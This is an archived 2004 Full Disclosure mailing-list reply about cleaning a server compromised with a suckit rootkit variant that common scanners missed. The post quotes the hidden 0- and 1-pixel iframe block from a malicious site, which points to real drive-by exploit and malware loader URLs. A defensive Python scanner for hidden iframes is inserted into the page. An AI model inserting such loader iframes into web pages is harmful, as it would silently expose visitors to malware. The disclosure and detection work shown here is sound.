Full Disclosure mailing list archives
Re: xpire.info & splitinfinity.info - exploits in the wild
From: "Elia Florio" <eflorio () edmaster it>
Date: Wed, 27 Oct 2004 01:22:06 +0200
Finally, I cleaned the compromised box of my friend :)) I've found (following many helpful suggestions from people on the FD list) that a variant of the "suckit" rootkit was installed on this machine. The strange thing is that "rkhunter" and "chkrootkit" don't catch it :(((( in any way and they said that everything is ok. To find suckit and deactivate it I used this: http://tsd.student.utwente.nl/skdetect/ It's code based on the suckit source code, but without the malware part. It can dig into /dev/kmem and explore sys_call_table[]; skdetect was able to find suckit installed. Another person who was compromised by the "xpire.info" hacker told me that the symptoms were the same and on his host too he found this suckit variant installed.

suckit version 'Q' DETECTED
kernel-part uninstall seems successful.

After reboot everything came back to normal activity. Thank you to everyone for the answers given to me (Ron DuFresne, Nick FitzGerald, Kevin and others). Actually on the "xpire.info/fa/?d=get" malware page you can find these exploits in the wild:

<IFRAME SRC="http://www.sp2fucked.biz/user28/counter.htm" WIDTH=0 BORDER=0 HEIGHT=0></IFRAME>
<iframe src="http://xpire.info/fa/t3.htm" width=1 height=1></iframe>
<iframe src="http://xpire.info/fa/x.htm" width=1 height=1></iframe>
<iframe src="http://xpire.info/fa/proc.htm" width=1 height=1></iframe>
<iframe src="http://xpire.info/fa/runevil.htm" width=1 height=1></iframe>
<iframe src="http://213.159.117.133/dl/adv121.php" width=1 height=1></iframe>
<!-- <IFRAME SRC="http://x.full-tgp.net/?fox.com" WIDTH=1 HEIGHT=1></IFRAME> //-->

There are a lot of backdoors/trojans ready to install and the bad news is that most of this malware is recompiled, so many AVs are fooled and don't catch them (for example Symantec and ClamAV don't recognize many malware samples on this site, after a quick test made with www.virustotal.com)

Bye, EF

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
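The loader frames pasted in the message above all share one trait: 0 or 1 pixel dimensions so the visitor never sees them. The following scanner is an added example, not code from the post or from skdetect; it flags such hidden iframes in a page's HTML so a web admin can spot an injected drive-by block. The sample HTML and its example.invalid URLs are constructed here.

```python
"""Flag hidden IFRAMEs of the kind used by drive-by loader pages.

An iframe whose width or height is at most HIDDEN_PX pixels is treated as
hidden and reported with its src.  Iframes inside HTML comments are not
active and are therefore ignored (HTMLParser routes them to handle_comment).
"""
from html.parser import HTMLParser

HIDDEN_PX = 1  # width/height at or below this is considered invisible

# Constructed sample page: two hidden loaders, one visible frame, one commented out.
SAMPLE_HTML = """<html><body>
<p>Welcome to our site</p>
<iframe src="http://example.invalid/counter.htm" width=0 border=0 height=0></iframe>
<iframe src="http://example.invalid/x.htm" width=1 height=1></iframe>
<iframe src="http://example.invalid/video" width=640 height=480></iframe>
<!-- <iframe src="http://example.invalid/old.htm" width=1 height=1></iframe> -->
</body></html>"""


def _px(value):
    """Parse a pixel attribute like '0' or '1px'; None for missing or non-pixel values ('100%')."""
    if value is None:
        return None
    v = value.strip().lower().rstrip("px").strip()
    return int(v) if v.isdigit() else None


class HiddenIframeFinder(HTMLParser):
    """Collect (src, width, height) for every iframe that is effectively invisible."""

    def __init__(self):
        super().__init__()
        self.hidden = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":  # HTMLParser already lowercases tag and attribute names
            return
        a = {k: (v or "") for k, v in attrs}
        width, height = _px(a.get("width")), _px(a.get("height"))
        if (width is not None and width <= HIDDEN_PX) or (height is not None and height <= HIDDEN_PX):
            self.hidden.append((a.get("src", ""), width, height))


def find_hidden_iframes(html):
    """Return a list of (src, width, height) tuples for hidden iframes found in html."""
    parser = HiddenIframeFinder()
    parser.feed(html)
    parser.close()
    return parser.hidden


if __name__ == "__main__":
    for src, w, h in find_hidden_iframes(SAMPLE_HTML):
        print(f"hidden iframe {w}x{h} -> {src}")
```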
Current thread:
- xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Kevin (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Nick FitzGerald (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Ron DuFresne (Oct 25)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 26)
- Re: [SPAM] Re: xpire.info & splitinfinity.info - exploits in the wild Hugo van der Kooij (Oct 26)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 26)
- <Possible follow-ups>
- Re: xpire.info & splitinfinity.info - exploits in the wild bowwow (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 27)
- Re: [SPAM] Re: xpire.info & splitinfinity.info - exploits in the wild Hugo van der Kooij (Oct 27)
- Re: xpire.info & splitinfinity.info - exploits in the wild Kevin (Oct 24)